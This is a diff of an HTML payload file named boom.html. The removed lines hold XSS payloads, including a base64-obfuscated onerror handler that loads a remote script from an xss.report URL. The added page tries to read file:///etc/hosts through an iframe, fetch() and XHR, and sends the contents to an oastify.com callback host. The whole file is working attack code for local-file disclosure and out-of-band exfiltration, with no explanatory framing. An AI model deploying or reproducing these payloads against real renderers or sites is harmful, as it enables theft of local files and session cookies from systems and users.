--- a/boom.html
+++ b/boom.html
@@ -1,4 +1,18 @@
-<img src=x onerror=prompt(document.domain)>
-<img src=x onerror=confirm(document.cookie)>
-"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2Jvb202NzAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
+<!DOCTYPE html>
+<body>
+  <iframe src="file:///etc/hosts" style="display:none"></iframe>
+  <script>
+    // Attempt to read via fetch()
+    fetch('file:///etc/hosts')
+      .then(r => r.text())
+      .then(d => fetch('https://ovnec7mtivnad010i3m0a2od74dw1upj.oastify.com/exfil', { method: 'POST', body: d }))
+      .catch(e => fetch('https://ovnec7mtivnad010i3m0a2od74dw1upj.oastify.com/error', { body: e.message }));
 
+    // Fallback to XHR
+    const xhr = new XMLHttpRequest();
+    xhr.open('GET', 'file:///etc/hosts', true);
+    xhr.onload = () => fetch('https://ovnec7mtivnad010i3m0a2od74dw1upj.oastify.com/xhr', { body: xhr.responseText });
+    xhr.send();
+  </script>
+</body>
+</html>
